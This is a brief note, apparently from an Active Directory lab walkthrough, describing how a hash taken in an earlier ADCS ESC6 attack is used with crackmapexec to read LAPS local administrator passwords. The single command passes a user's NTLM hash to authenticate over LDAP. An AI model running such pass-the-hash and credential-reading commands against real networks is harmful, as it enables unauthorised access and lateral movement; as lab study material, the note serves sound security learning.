Last updated 1 year ago
To read LAPS password, the easy way is with the cme module.
We got teresas hash from the dump of the ADCS ESC6 Attack
crackmapexec ldap 192.168.56.12 -d Maryland.local -u teresa.Perez -H '4d737ec9ecf0b9955a161773cfed9611' --module laps